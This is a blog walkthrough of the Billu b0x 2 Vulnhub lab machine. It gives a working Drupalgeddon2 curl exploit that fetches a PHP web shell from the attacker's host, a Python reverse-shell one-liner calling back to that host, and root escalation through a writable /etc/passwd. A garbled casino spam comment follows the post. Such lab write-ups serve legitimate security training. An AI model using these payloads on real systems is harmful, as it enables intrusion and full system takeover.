Skip to main content

Billu b0x 2 Walkthrough - Vulnhub Machine

Hello Friends,

This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar .
This machine is based on latest vulnerability of Drupal CMS.

Let's get started ...

Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt.

The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl.

I used following command to download a php web shell -
curl -s -X 'POST'   --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form'   'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5


Through php shell , I got reverse shell on netcat by using python reverse shell command.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



The reverse shell which I got  was not interactive and therefore I needed to spawn tty using-  python -c 'import pty;pty.spawn("bin/sh")' command 


I tried multiple things including running some kernel exploits etc. I found that /etc/passwd was having all the permissions and I was able to edit this file.I saw that there was a account present in /etc/passwd file with some encrypted hashes.I saw similar thing during my oscp lab and therefore tried adding my root password hash into passwd root user entry.


If a password hash is present in the second column in /etc/passwd, it takes precedence over the one in /etc/shadow and thus I was able to login as root .




Thanks for reading .Happy Hacking ;) 

Comments

  1. It comes 포커 with 36 common numbers and one green zero, and 2 of|and a pair of}.70% house edge. The roulette wheel is precision-engineered by Cammegh of their manufacturing unit in Kent, utilizing the identical exacting manufacturing methods and supplies used of their on line casino grade wheels. Cammegh’s signature scalloped separators contrast elegantly with the piano gloss black end of the Bond wheel, while the curved ball-stops ensure most randomness in every sport. A massive monetary loss is certain in lengthy term|the lengthy run} if the participant continued to employ this technique. Another technique is the Fibonacci system, the place bets are calculated according to the Fibonacci sequence.

    ReplyDelete

Post a Comment

Popular posts from this blog

Review of Pentester Academy - Attacking and Defending Active Directory Lab

Few months ago I didn't know what Active Directory is, and why should I care about it and never heard about ACL abuse and all. Although I had attended a BPAD (Breaking and Pwning Active Directory) training which was provided by Nullcon but I was not confident enough to go for this course exam, since my day-today activity involves VAPT stuffs related to Web/Network/Mobile and sometimes basic malware analysis (very basic one :p).  I started doing offshore lab and took help from some friends in understanding few Active Directory concepts. I did many silly mistakes during the lab and learned a lot. Meanwhile I registered for Active Directory Lab Course and got it in a discounted offer for first 50 students of about 11k INR  ( 1 mont lab access) :). Before wasting time any further let's dive into the review. The course -  https://www.pentesteracademy.com/activedirectorylab Certification - Certified Red Team Professional The Course Content  - After paying the course fee,

Backdoring PE files using code caves : OSCE/CTP Module 0x03 (OSCE Preparation)

Hello Readers, This post will cover Backdooring of P.E file by using code caves . There are already good tools to do this for you eg. Backdoor Factory and Shelter which will do the same job and even bypass some static analysis of few antiviruses . I will be covering the manual approach of backdooring a PE file . Let's understand some terms : [x] PE file : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. [x] Code Cave : Wikipedia says - "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script." [x] Shellcode : Wikipedia - &qu

Exit Shellcode x86

Exit in Assembly : For writing exit assembly program we need to check exit syscall reference number . I use this online man page : https://syscalls.kernelgrok.com / From above we can conclude that for exit system call we need 2 registers : [x] EAX => Eax should contain exit sys call number (0x01) [x] EBX => Ebx should contain  error code (0 for normal exit) A good shell-code : [x] Should be Null free [x] Smaller in length [x] Position Independent Below is my code : I wrote a small script to compile and assemble nasm program and extract the shellcode from it then saving the shellcode into a c file and compiling the new c program. Here is my script : Tweaked some instructions :p Next you can debug and check the execution in gdb by setting breakpoints and stepping instructions one by one . Below is my gdb console before calling interrupt int 0x80 showing the value of eax and ebx as expected :)